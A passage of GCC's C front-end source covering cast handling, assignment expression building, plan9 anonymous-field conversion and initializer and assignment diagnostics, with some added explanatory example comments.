&& comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (field)),
TYPE_MAIN_VARIANT (TREE_TYPE (value))))
break;
if (field)
{
tree t;
bool maybe_const = true;
pedwarn (loc, OPT_Wpedantic, "ISO C forbids casts to union type");
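/* Hypothetical example of this GNU extension:
     union u { int i; double d; };
     union u v = (union u) 5;    -- initializes the 'int' member  */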
t = c_fully_fold (value, false, &maybe_const);
t = build_constructor_single (type, field, t);
if (!maybe_const)
t = c_wrap_maybe_const (t, true);
t = digest_init (loc, type, t,
NULL_TREE, false, true, 0);
TREE_CONSTANT (t) = TREE_CONSTANT (value);
return t;
}
error_at (loc, "cast to union type from type not present in union");
return error_mark_node;
}
else
{
tree otype, ovalue;
if (type == void_type_node)
{
tree t = build1 (CONVERT_EXPR, type, value);
SET_EXPR_LOCATION (t, loc);
return t;
}
otype = TREE_TYPE (value);
/* Optionally warn about potentially worrisome casts. */
if (warn_cast_qual
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE)
handle_warn_cast_qual (loc, type, otype);
/* Warn about conversions between pointers to disjoint
address spaces. */
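/* E.g. (target-specific sketch): on AVR, casting an '__flash int *'
to a plain 'int *' crosses disjoint address spaces and warns.  */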
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& !null_pointer_constant_p (value))
{
addr_space_t as_to = TYPE_ADDR_SPACE (TREE_TYPE (type));
addr_space_t as_from = TYPE_ADDR_SPACE (TREE_TYPE (otype));
addr_space_t as_common;
if (!addr_space_superset (as_to, as_from, &as_common))
{
if (ADDR_SPACE_GENERIC_P (as_from))
warning_at (loc, 0, "cast to %s address space pointer "
"from disjoint generic address space pointer",
c_addr_space_name (as_to));
else if (ADDR_SPACE_GENERIC_P (as_to))
warning_at (loc, 0, "cast to generic address space pointer "
"from disjoint %s address space pointer",
c_addr_space_name (as_from));
else
warning_at (loc, 0, "cast to %s address space pointer "
"from disjoint %s address space pointer",
c_addr_space_name (as_to),
c_addr_space_name (as_from));
}
}
/* Warn about possible alignment problems. */
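/* E.g. casting 'char *' to 'int *' typically increases the required
alignment and is diagnosed here on STRICT_ALIGNMENT targets or under
-Wcast-align=strict, i.e. warn_cast_align == 2 (sketch).  */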
if ((STRICT_ALIGNMENT || warn_cast_align == 2)
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != VOID_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != FUNCTION_TYPE
/* Don't warn about opaque types, where the actual alignment
restriction is unknown. */
&& !(RECORD_OR_UNION_TYPE_P (TREE_TYPE (otype))
&& TYPE_MODE (TREE_TYPE (otype)) == VOIDmode)
&& min_align_of_type (TREE_TYPE (type))
> min_align_of_type (TREE_TYPE (otype)))
warning_at (loc, OPT_Wcast_align,
"cast increases required alignment of target type");
if (TREE_CODE (type) == INTEGER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TYPE_PRECISION (type) != TYPE_PRECISION (otype))
/* Unlike conversion of integers to pointers, where the
warning is disabled for converting constants because
of cases such as SIG_*, warn about converting constant
pointers to integers. In some cases it may cause unwanted
sign extension, and a warning is appropriate. */
warning_at (loc, OPT_Wpointer_to_int_cast,
"cast from pointer to integer of different size");
if (TREE_CODE (value) == CALL_EXPR
&& TREE_CODE (type) != TREE_CODE (otype))
warning_at (loc, OPT_Wbad_function_cast,
"cast from function call of type %qT "
"to non-matching type %qT", otype, type);
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == INTEGER_TYPE
&& TYPE_PRECISION (type) != TYPE_PRECISION (otype)
/* Don't warn about converting any constant. */
&& !TREE_CONSTANT (value))
warning_at (loc,
OPT_Wint_to_pointer_cast, "cast to pointer from integer "
"of different size");
if (warn_strict_aliasing <= 2)
strict_aliasing_warning (EXPR_LOCATION (value), type, expr);
/* If pedantic, warn for conversions between function and object
pointer types, except for converting a null pointer constant
to function pointer type. */
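/* E.g. (hypothetical): '(void *) printf' draws the first pedwarn
below, and '(int (*)(void)) p' for an object pointer 'p' draws the
second, unless the operand is a null pointer constant.  */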
if (pedantic
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (otype)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (type)) != FUNCTION_TYPE)
pedwarn (loc, OPT_Wpedantic, "ISO C forbids "
"conversion of function pointer to object pointer type");
if (pedantic
&& TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (type)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (otype)) != FUNCTION_TYPE
&& !null_pointer_constant_p (value))
pedwarn (loc, OPT_Wpedantic, "ISO C forbids "
"conversion of object pointer to function pointer type");
if (TREE_CODE (type) == POINTER_TYPE
&& TREE_CODE (otype) == POINTER_TYPE
&& TREE_CODE (TREE_TYPE (type)) == FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (otype)) == FUNCTION_TYPE
&& !c_safe_function_type_cast_p (TREE_TYPE (type),
TREE_TYPE (otype)))
warning_at (loc, OPT_Wcast_function_type,
"cast between incompatible function types"
" from %qT to %qT", otype, type);
ovalue = value;
value = convert (type, value);
/* Ignore any integer overflow caused by the cast. */
if (TREE_CODE (value) == INTEGER_CST && !FLOAT_TYPE_P (otype))
{
if (CONSTANT_CLASS_P (ovalue) && TREE_OVERFLOW (ovalue))
{
if (!TREE_OVERFLOW (value))
{
/* Avoid clobbering a shared constant. */
value = copy_node (value);
TREE_OVERFLOW (value) = TREE_OVERFLOW (ovalue);
}
}
else if (TREE_OVERFLOW (value))
/* Reset VALUE's overflow flags, ensuring constant sharing. */
value = wide_int_to_tree (TREE_TYPE (value), wi::to_wide (value));
}
}
/* Don't let a cast be an lvalue. */
if (lvalue_p (value))
value = non_lvalue_loc (loc, value);
/* Don't allow the results of casting to floating-point or complex
types to be confused with actual constants, or casts involving
integer and pointer types other than direct integer-to-integer
and integer-to-pointer conversions to be confused with integer
constant expressions and null pointer constants. */
if (TREE_CODE (value) == REAL_CST
|| TREE_CODE (value) == COMPLEX_CST
|| (TREE_CODE (value) == INTEGER_CST
&& !((TREE_CODE (expr) == INTEGER_CST
&& INTEGRAL_TYPE_P (TREE_TYPE (expr)))
|| TREE_CODE (expr) == REAL_CST
|| TREE_CODE (expr) == COMPLEX_CST)))
value = build1 (NOP_EXPR, type, value);
/* If the expression has integer operands and so can occur in an
unevaluated part of an integer constant expression, ensure the
return value reflects this. */
if (int_operands
&& INTEGRAL_TYPE_P (type)
&& !EXPR_INT_CONST_OPERANDS (value))
value = note_integer_operands (value);
protected_set_expr_location (value, loc);
return value;
}
/* Interpret a cast of expression EXPR to type TYPE. LOC is the
location of the open paren of the cast, or the position of the cast
expr. */
tree
c_cast_expr (location_t loc, struct c_type_name *type_name, tree expr)
{
tree type;
tree type_expr = NULL_TREE;
bool type_expr_const = true;
tree ret;
int saved_wsp = warn_strict_prototypes;
/* This avoids warnings about unprototyped casts on
integers. E.g. "#define SIG_DFL (void(*)())0". */
if (TREE_CODE (expr) == INTEGER_CST)
warn_strict_prototypes = 0;
type = groktypename (type_name, &type_expr, &type_expr_const);
warn_strict_prototypes = saved_wsp;
if (TREE_CODE (expr) == ADDR_EXPR && !VOID_TYPE_P (type)
&& reject_gcc_builtin (expr))
return error_mark_node;
ret = build_c_cast (loc, type, expr);
if (type_expr)
{
bool inner_expr_const = true;
ret = c_fully_fold (ret, require_constant_value, &inner_expr_const);
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (ret), type_expr, ret);
C_MAYBE_CONST_EXPR_NON_CONST (ret) = !(type_expr_const
&& inner_expr_const);
SET_EXPR_LOCATION (ret, loc);
}
if (!EXPR_HAS_LOCATION (ret))
protected_set_expr_location (ret, loc);
/* C++ does not permit types to be defined in a cast, but it
allows references to incomplete types. */
if (warn_cxx_compat && type_name->specs->typespec_kind == ctsk_tagdef)
warning_at (loc, OPT_Wc___compat,
"defining a type in a cast is invalid in C++");
return ret;
}
/* Build an assignment expression of lvalue LHS from value RHS.
If LHS_ORIGTYPE is not NULL, it is the original type of LHS, which
may differ from TREE_TYPE (LHS) for an enum bitfield.
MODIFYCODE is the code for a binary operator that we use
to combine the old value of LHS with RHS to get the new value.
Or else MODIFYCODE is NOP_EXPR meaning do a simple assignment.
If RHS_ORIGTYPE is not NULL_TREE, it is the original type of RHS,
which may differ from TREE_TYPE (RHS) for an enum value.
LOCATION is the location of the MODIFYCODE operator.
RHS_LOC is the location of the RHS. */
tree
build_modify_expr (location_t location, tree lhs, tree lhs_origtype,
enum tree_code modifycode,
location_t rhs_loc, tree rhs, tree rhs_origtype)
{
tree result;
tree newrhs;
tree rhseval = NULL_TREE;
tree lhstype = TREE_TYPE (lhs);
tree olhstype = lhstype;
bool npc;
bool is_atomic_op;
/* Types that aren't fully specified cannot be used in assignments. */
lhs = require_complete_type (location, lhs);
/* Avoid duplicate error messages from operands that had errors. */
if (TREE_CODE (lhs) == ERROR_MARK || TREE_CODE (rhs) == ERROR_MARK)
return error_mark_node;
/* Ensure an error for assigning a non-lvalue array to an array in
C90. */
if (TREE_CODE (lhstype) == ARRAY_TYPE)
{
error_at (location, "assignment to expression with array type");
return error_mark_node;
}
/* For ObjC properties, defer this check. */
if (!objc_is_property_ref (lhs) && !lvalue_or_else (location, lhs, lv_assign))
return error_mark_node;
is_atomic_op = really_atomic_lvalue (lhs);
newrhs = rhs;
if (TREE_CODE (lhs) == C_MAYBE_CONST_EXPR)
{
tree inner = build_modify_expr (location, C_MAYBE_CONST_EXPR_EXPR (lhs),
lhs_origtype, modifycode, rhs_loc, rhs,
rhs_origtype);
if (inner == error_mark_node)
return error_mark_node;
result = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (lhs), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (lhs));
C_MAYBE_CONST_EXPR_NON_CONST (result) = 1;
protected_set_expr_location (result, location);
return result;
}
/* If a binary op has been requested, combine the old LHS value with the RHS
producing the value we should actually store into the LHS. */
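/* E.g. (sketch): for 'x += f ()' MODIFYCODE is PLUS_EXPR, and the
call to 'f' is pre-evaluated via save_expr below so its side effects
cannot interleave with those of evaluating 'x'.  */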
if (modifycode != NOP_EXPR)
{
lhs = c_fully_fold (lhs, false, NULL, true);
lhs = stabilize_reference (lhs);
/* Construct the RHS for any non-atomic compound assignment. */
if (!is_atomic_op)
{
/* If in LHS op= RHS the RHS has side-effects, ensure they
are preevaluated before the rest of the assignment expression's
side-effects, because RHS could contain e.g. function calls
that modify LHS. */
if (TREE_SIDE_EFFECTS (rhs))
{
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
newrhs = save_expr (TREE_OPERAND (rhs, 0));
else
newrhs = save_expr (rhs);
rhseval = newrhs;
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
newrhs = build1 (EXCESS_PRECISION_EXPR, TREE_TYPE (rhs),
newrhs);
}
newrhs = build_binary_op (location,
modifycode, lhs, newrhs, true);
/* The original type of the right hand side is no longer
meaningful. */
rhs_origtype = NULL_TREE;
}
}
if (c_dialect_objc ())
{
/* Check if we are modifying an Objective-C property reference;
if so, we need to generate setter calls. */
if (TREE_CODE (newrhs) == EXCESS_PRECISION_EXPR)
result = objc_maybe_build_modify_expr (lhs, TREE_OPERAND (newrhs, 0));
else
result = objc_maybe_build_modify_expr (lhs, newrhs);
if (result)
goto return_result;
/* Else, do the check that we postponed for Objective-C. */
if (!lvalue_or_else (location, lhs, lv_assign))
return error_mark_node;
}
/* Give an error for storing in something that is 'const'. */
if (TYPE_READONLY (lhstype)
|| (RECORD_OR_UNION_TYPE_P (lhstype)
&& C_TYPE_FIELDS_READONLY (lhstype)))
{
readonly_error (location, lhs, lv_assign);
return error_mark_node;
}
else if (TREE_READONLY (lhs))
readonly_warning (lhs, lv_assign);
/* If storing into a structure or union member,
it has probably been given type `int'.
Compute the type that would go with
the actual amount of storage the member occupies. */
if (TREE_CODE (lhs) == COMPONENT_REF
&& (TREE_CODE (lhstype) == INTEGER_TYPE
|| TREE_CODE (lhstype) == BOOLEAN_TYPE
|| TREE_CODE (lhstype) == REAL_TYPE
|| TREE_CODE (lhstype) == ENUMERAL_TYPE))
lhstype = TREE_TYPE (get_unwidened (lhs, 0));
/* If we are storing in a field that is actually narrower than its
declared type (e.g. a short, or a bit-field), we must store in the
field in its actual type. */
if (lhstype != TREE_TYPE (lhs))
{
lhs = copy_node (lhs);
TREE_TYPE (lhs) = lhstype;
}
/* Issue -Wc++-compat warnings about an assignment to an enum type
when LHS does not have its original type. This happens for,
e.g., an enum bitfield in a struct. */
if (warn_cxx_compat
&& lhs_origtype != NULL_TREE
&& lhs_origtype != lhstype
&& TREE_CODE (lhs_origtype) == ENUMERAL_TYPE)
{
tree checktype = (rhs_origtype != NULL_TREE
? rhs_origtype
: TREE_TYPE (rhs));
if (checktype != error_mark_node
&& (TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (lhs_origtype)
|| (is_atomic_op && modifycode != NOP_EXPR)))
warning_at (location, OPT_Wc___compat,
"enum conversion in assignment is invalid in C++");
}
/* If the lhs is atomic, remove that qualifier. */
if (is_atomic_op)
{
lhstype = build_qualified_type (lhstype,
(TYPE_QUALS (lhstype)
& ~TYPE_QUAL_ATOMIC));
olhstype = build_qualified_type (olhstype,
(TYPE_QUALS (lhstype)
& ~TYPE_QUAL_ATOMIC));
}
/* Convert new value to destination type. Fold it first, then
restore any excess precision information, for the sake of
conversion warnings. */
if (!(is_atomic_op && modifycode != NOP_EXPR))
{
tree rhs_semantic_type = NULL_TREE;
if (TREE_CODE (newrhs) == EXCESS_PRECISION_EXPR)
{
rhs_semantic_type = TREE_TYPE (newrhs);
newrhs = TREE_OPERAND (newrhs, 0);
}
npc = null_pointer_constant_p (newrhs);
newrhs = c_fully_fold (newrhs, false, NULL);
if (rhs_semantic_type)
newrhs = build1 (EXCESS_PRECISION_EXPR, rhs_semantic_type, newrhs);
newrhs = convert_for_assignment (location, rhs_loc, lhstype, newrhs,
rhs_origtype, ic_assign, npc,
NULL_TREE, NULL_TREE, 0);
if (TREE_CODE (newrhs) == ERROR_MARK)
return error_mark_node;
}
/* Emit ObjC write barrier, if necessary. */
if (c_dialect_objc () && flag_objc_gc)
{
result = objc_generate_write_barrier (lhs, modifycode, newrhs);
if (result)
{
protected_set_expr_location (result, location);
goto return_result;
}
}
/* Scan operands. */
if (is_atomic_op)
result = build_atomic_assign (location, lhs, modifycode, newrhs, false);
else
{
result = build2 (MODIFY_EXPR, lhstype, lhs, newrhs);
TREE_SIDE_EFFECTS (result) = 1;
protected_set_expr_location (result, location);
}
/* If we got the LHS in a different type for storing in,
convert the result back to the nominal type of LHS
so that the value we return always has the same type
as the LHS argument. */
if (olhstype == TREE_TYPE (result))
goto return_result;
result = convert_for_assignment (location, rhs_loc, olhstype, result,
rhs_origtype, ic_assign, false, NULL_TREE,
NULL_TREE, 0);
protected_set_expr_location (result, location);
return_result:
if (rhseval)
result = build2 (COMPOUND_EXPR, TREE_TYPE (result), rhseval, result);
return result;
}
/* Return whether STRUCT_TYPE has an anonymous field with type TYPE.
This is used to implement -fplan9-extensions. */
static bool
find_anonymous_field_with_type (tree struct_type, tree type)
{
tree field;
bool found;
gcc_assert (RECORD_OR_UNION_TYPE_P (struct_type));
found = false;
for (field = TYPE_FIELDS (struct_type);
field != NULL_TREE;
field = TREE_CHAIN (field))
{
tree fieldtype = (TYPE_ATOMIC (TREE_TYPE (field))
? c_build_qualified_type (TREE_TYPE (field),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (field)));
if (DECL_NAME (field) == NULL
&& comptypes (type, fieldtype))
{
if (found)
return false;
found = true;
}
else if (DECL_NAME (field) == NULL
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field))
&& find_anonymous_field_with_type (TREE_TYPE (field), type))
{
if (found)
return false;
found = true;
}
}
return found;
}
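/* Hypothetical -fplan9-extensions example:
     struct A { int i; };
     struct B { struct A; int j; };    -- anonymous field of type A
   Given 'struct B *b', the assignment 'struct A *a = b;' converts
   through the anonymous field via convert_to_anonymous_field below.  */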
/* RHS is an expression whose type is pointer to struct. If there is
an anonymous field in RHS with type TYPE, then return a pointer to
that field in RHS. This is used with -fplan9-extensions. This
returns NULL if no conversion could be found. */
static tree
convert_to_anonymous_field (location_t location, tree type, tree rhs)
{
tree rhs_struct_type, lhs_main_type;
tree field, found_field;
bool found_sub_field;
tree ret;
gcc_assert (POINTER_TYPE_P (TREE_TYPE (rhs)));
rhs_struct_type = TREE_TYPE (TREE_TYPE (rhs));
gcc_assert (RECORD_OR_UNION_TYPE_P (rhs_struct_type));
gcc_assert (POINTER_TYPE_P (type));
lhs_main_type = (TYPE_ATOMIC (TREE_TYPE (type))
? c_build_qualified_type (TREE_TYPE (type),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (type)));
found_field = NULL_TREE;
found_sub_field = false;
for (field = TYPE_FIELDS (rhs_struct_type);
field != NULL_TREE;
field = TREE_CHAIN (field))
{
if (DECL_NAME (field) != NULL_TREE
|| !RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
continue;
tree fieldtype = (TYPE_ATOMIC (TREE_TYPE (field))
? c_build_qualified_type (TREE_TYPE (field),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (TREE_TYPE (field)));
if (comptypes (lhs_main_type, fieldtype))
{
if (found_field != NULL_TREE)
return NULL_TREE;
found_field = field;
}
else if (find_anonymous_field_with_type (TREE_TYPE (field),
lhs_main_type))
{
if (found_field != NULL_TREE)
return NULL_TREE;
found_field = field;
found_sub_field = true;
}
}
if (found_field == NULL_TREE)
return NULL_TREE;
ret = fold_build3_loc (location, COMPONENT_REF, TREE_TYPE (found_field),
build_fold_indirect_ref (rhs), found_field,
NULL_TREE);
ret = build_fold_addr_expr_loc (location, ret);
if (found_sub_field)
{
ret = convert_to_anonymous_field (location, type, ret);
gcc_assert (ret != NULL_TREE);
}
return ret;
}
/* Issue an error message for a bad initializer component.
GMSGID identifies the message.
The component name is taken from the spelling stack. */
static void ATTRIBUTE_GCC_DIAG (2,0)
error_init (location_t loc, const char *gmsgid, ...)
{
char *ofwhat;
auto_diagnostic_group d;
/* The gmsgid may be a format string with %< and %>. */
va_list ap;
va_start (ap, gmsgid);
bool warned = emit_diagnostic_valist (DK_ERROR, loc, -1, gmsgid, &ap);
va_end (ap);
ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (loc, "(near initialization for %qs)", ofwhat);
}
/* Issue a pedantic warning for a bad initializer component. OPT is
the option OPT_* (from options.h) controlling this warning or 0 if
it is unconditionally given. GMSGID identifies the message. The
component name is taken from the spelling stack. */
static void ATTRIBUTE_GCC_DIAG (3,0)
pedwarn_init (location_t loc, int opt, const char *gmsgid, ...)
{
/* Use the location where a macro was expanded rather than where
it was defined to make sure macros defined in system headers
but used incorrectly elsewhere are diagnosed. */
location_t exploc = expansion_point_location_if_in_system_header (loc);
auto_diagnostic_group d;
va_list ap;
va_start (ap, gmsgid);
bool warned = emit_diagnostic_valist (DK_PEDWARN, exploc, opt, gmsgid, &ap);
va_end (ap);
char *ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (exploc, "(near initialization for %qs)", ofwhat);
}
/* Issue a warning for a bad initializer component.
OPT is the OPT_W* value corresponding to the warning option that
controls this warning. GMSGID identifies the message. The
component name is taken from the spelling stack. */
static void
warning_init (location_t loc, int opt, const char *gmsgid)
{
char *ofwhat;
bool warned;
auto_diagnostic_group d;
/* Use the location where a macro was expanded rather than where
it was defined to make sure macros defined in system headers
but used incorrectly elsewhere are diagnosed. */
location_t exploc = expansion_point_location_if_in_system_header (loc);
/* The gmsgid may be a format string with %< and %>. */
warned = warning_at (exploc, opt, gmsgid);
ofwhat = print_spelling ((char *) alloca (spelling_length () + 1));
if (*ofwhat && warned)
inform (exploc, "(near initialization for %qs)", ofwhat);
}
/* If TYPE is an array type and EXPR is a parenthesized string
constant, warn if pedantic that EXPR is being used to initialize an
object of type TYPE. */
void
maybe_warn_string_init (location_t loc, tree type, struct c_expr expr)
{
if (pedantic
&& TREE_CODE (type) == ARRAY_TYPE
&& TREE_CODE (expr.value) == STRING_CST
&& expr.original_code != STRING_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array initialized from parenthesized string constant");
}
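/* E.g. 'char s[] = ("abc");' is diagnosed above with -Wpedantic,
while the unparenthesized 'char s[] = "abc";' is not (sketch).  */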
/* Attempt to locate the parameter with the given index within FNDECL,
returning DECL_SOURCE_LOCATION (FNDECL) if it can't be found. */
static location_t
get_fndecl_argument_location (tree fndecl, int argnum)
{
int i;
tree param;
/* Locate param by index within DECL_ARGUMENTS (fndecl). */
for (i = 0, param = DECL_ARGUMENTS (fndecl);
i < argnum && param;
i++, param = TREE_CHAIN (param))
;
/* If something went wrong (e.g. if we have a builtin and thus no arguments),
return DECL_SOURCE_LOCATION (FNDECL). */
if (param == NULL)
return DECL_SOURCE_LOCATION (fndecl);
return DECL_SOURCE_LOCATION (param);
}
/* Issue a note about a mismatching argument for parameter PARMNUM
to FUNDECL, for types EXPECTED_TYPE and ACTUAL_TYPE.
Attempt to issue the note at the pertinent parameter of the decl;
failing that issue it at the location of FUNDECL; failing that
issue it at PLOC. */
static void
inform_for_arg (tree fundecl, location_t ploc, int parmnum,
tree expected_type, tree actual_type)
{
location_t loc;
if (fundecl && !DECL_IS_BUILTIN (fundecl))
loc = get_fndecl_argument_location (fundecl, parmnum - 1);
else
loc = ploc;
inform (loc,
"expected %qT but argument is of type %qT",
expected_type, actual_type);
}
/* Issue a warning when an argument of ARGTYPE is passed to a built-in
function FUNDECL declared without prototype to parameter PARMNUM of
PARMTYPE when ARGTYPE does not promote to PARMTYPE. */
static void
maybe_warn_builtin_no_proto_arg (location_t loc, tree fundecl, int parmnum,
tree parmtype, tree argtype)
{
tree_code parmcode = TREE_CODE (parmtype);
tree_code argcode = TREE_CODE (argtype);
tree promoted = c_type_promotes_to (argtype);
/* Avoid warning for enum arguments that promote to an integer type
of the same size/mode. */
if (parmcode == INTEGER_TYPE
&& argcode == ENUMERAL_TYPE
&& TYPE_MODE (parmtype) == TYPE_MODE (argtype))
return;
if ((parmcode == argcode
|| (parmcode == INTEGER_TYPE
&& argcode == ENUMERAL_TYPE))
&& TYPE_MAIN_VARIANT (parmtype) == TYPE_MAIN_VARIANT (promoted))
return;
/* This diagnoses even signed/unsigned mismatches.  Those might be
safe in many cases, but GCC may emit suboptimal code for them, so
warning here nudges users toward declarations that let GCC generate
better code. */
if (warning_at (loc, OPT_Wbuiltin_declaration_mismatch,
TYPE_MAIN_VARIANT (promoted) == argtype
? G_("%qD argument %d type is %qT where %qT is expected "
"in a call to built-in function declared without "
"prototype")
: G_("%qD argument %d promotes to %qT where %qT is expected "
"in a call to built-in function declared without "
"prototype"),
fundecl, parmnum, promoted, parmtype))
inform (DECL_SOURCE_LOCATION (fundecl),
"built-in %qD declared here",
fundecl);
}
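/* E.g. (sketch): with the built-in declared as 'double sqrt ();',
the call 'sqrt (2)' passes an 'int' where 'double' is expected and
draws the first message above.  */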
/* Convert value RHS to type TYPE as preparation for an assignment to
an lvalue of type TYPE. If ORIGTYPE is not NULL_TREE, it is the
original type of RHS; this differs from TREE_TYPE (RHS) for enum
types. NULL_POINTER_CONSTANT says whether RHS was a null pointer
constant before any folding.
The real work of conversion is done by `convert'.
The purpose of this function is to generate error messages
for assignments that are not allowed in C.
ERRTYPE says whether it is argument passing, assignment,
initialization or return.
In the following example, '~' denotes where EXPR_LOC and '^' where
LOCATION point to:
     f (var);      [ic_argpass]
     ^  ~~~
     x = var;      [ic_assign]
       ^ ~~~
     int x = var;  [ic_init]
             ^^^
     return x;     [ic_return]
            ^
FUNCTION is a tree for the function being called.
PARMNUM is the number of the argument, for printing in error messages.
WARNOPT may be set to a warning option to issue the corresponding warning
rather than an error for invalid conversions. Used for calls to built-in
functions declared without a prototype. */
static tree
convert_for_assignment (location_t location, location_t expr_loc, tree type,
tree rhs, tree origtype, enum impl_conv errtype,
bool null_pointer_constant, tree fundecl,
tree function, int parmnum, int warnopt /* = 0 */)
{
enum tree_code codel = TREE_CODE (type);
tree orig_rhs = rhs;
tree rhstype;
enum tree_code coder;
tree rname = NULL_TREE;
bool objc_ok = false;
/* Use the expansion point location to handle cases such as user's
function returning a wrong-type macro defined in a system header. */
location = expansion_point_location_if_in_system_header (location);
if (errtype == ic_argpass)
{
tree selector;
/* Change pointer to function to the function itself for
diagnostics. */
if (TREE_CODE (function) == ADDR_EXPR
&& TREE_CODE (TREE_OPERAND (function, 0)) == FUNCTION_DECL)
function = TREE_OPERAND (function, 0);
/* Handle an ObjC selector specially for diagnostics. */
selector = objc_message_selector ();
rname = function;
if (selector && parmnum > 2)
{
rname = selector;
parmnum -= 2;
}
}
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. */
#define PEDWARN_FOR_ASSIGNMENT(LOCATION, PLOC, OPT, AR, AS, IN, RE) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (pedwarn (PLOC, OPT, AR, parmnum, rname)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
pedwarn (LOCATION, OPT, AS); \
break; \
case ic_init: \
pedwarn_init (LOCATION, OPT, IN); \
break; \
case ic_return: \
pedwarn (LOCATION, OPT, RE); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. It is the same as PEDWARN_FOR_ASSIGNMENT but with an
extra parameter to enumerate qualifiers. */
#define PEDWARN_FOR_QUALIFIERS(LOCATION, PLOC, OPT, AR, AS, IN, RE, QUALS) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (pedwarn (PLOC, OPT, AR, parmnum, rname, QUALS)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
pedwarn (LOCATION, OPT, AS, QUALS); \
break; \
case ic_init: \
pedwarn (LOCATION, OPT, IN, QUALS); \
break; \
case ic_return: \
pedwarn (LOCATION, OPT, RE, QUALS); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
/* This macro is used to emit diagnostics to ensure that all format
strings are complete sentences, visible to gettext and checked at
compile time. It is the same as PEDWARN_FOR_QUALIFIERS but uses
warning_at instead of pedwarn. */
#define WARNING_FOR_QUALIFIERS(LOCATION, PLOC, OPT, AR, AS, IN, RE, QUALS) \
do { \
switch (errtype) \
{ \
case ic_argpass: \
{ \
auto_diagnostic_group d; \
if (warning_at (PLOC, OPT, AR, parmnum, rname, QUALS)) \
inform_for_arg (fundecl, (PLOC), parmnum, type, rhstype); \
} \
break; \
case ic_assign: \
warning_at (LOCATION, OPT, AS, QUALS); \
break; \
case ic_init: \
warning_at (LOCATION, OPT, IN, QUALS); \
break; \
case ic_return: \
warning_at (LOCATION, OPT, RE, QUALS); \
break; \
default: \
gcc_unreachable (); \
} \
} while (0)
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
rhs = TREE_OPERAND (rhs, 0);
rhstype = TREE_TYPE (rhs);
coder = TREE_CODE (rhstype);
if (coder == ERROR_MARK)
return error_mark_node;
if (c_dialect_objc ())
{
int parmno;
switch (errtype)
{
case ic_return:
parmno = 0;
break;
case ic_assign:
parmno = -1;
break;
case ic_init:
parmno = -2;
break;
default:
parmno = parmnum;
break;
}
objc_ok = objc_compare_types (type, rhstype, parmno, rname);
}
if (warn_cxx_compat)
{
tree checktype = origtype != NULL_TREE ? origtype : rhstype;
if (checktype != error_mark_node
&& TREE_CODE (type) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (type))
switch (errtype)
{
case ic_argpass:
if (pedwarn (expr_loc, OPT_Wc___compat, "enum conversion when "
"passing argument %d of %qE is invalid in C++",
parmnum, rname))
inform ((fundecl && !DECL_IS_BUILTIN (fundecl))
? DECL_SOURCE_LOCATION (fundecl) : expr_loc,
"expected %qT but argument is of type %qT",
type, rhstype);
break;
case ic_assign:
pedwarn (location, OPT_Wc___compat, "enum conversion from %qT to "
"%qT in assignment is invalid in C++", rhstype, type);
break;
case ic_init:
pedwarn_init (location, OPT_Wc___compat, "enum conversion from "
"%qT to %qT in initialization is invalid in C++",
rhstype, type);
break;
case ic_return:
pedwarn (location, OPT_Wc___compat, "enum conversion from %qT to "
"%qT in return is invalid in C++", rhstype, type);
break;
default:
gcc_unreachable ();
}
}
if (warn_enum_conversion)
{
tree checktype = origtype != NULL_TREE ? origtype : rhstype;
if (checktype != error_mark_node
&& TREE_CODE (checktype) == ENUMERAL_TYPE
&& TREE_CODE (type) == ENUMERAL_TYPE
&& TYPE_MAIN_VARIANT (checktype) != TYPE_MAIN_VARIANT (type))
{
gcc_rich_location loc (location);
warning_at (&loc, OPT_Wenum_conversion,
"implicit conversion from %qT to %qT",
checktype, type);
}
}
if (TYPE_MAIN_VARIANT (type) == TYPE_MAIN_VARIANT (rhstype))
{
warn_for_address_or_pointer_of_packed_member (type, orig_rhs);
return rhs;
}
if (coder == VOID_TYPE)
{
/* Except for passing an argument to an unprototyped function,
this is a constraint violation. When passing an argument to
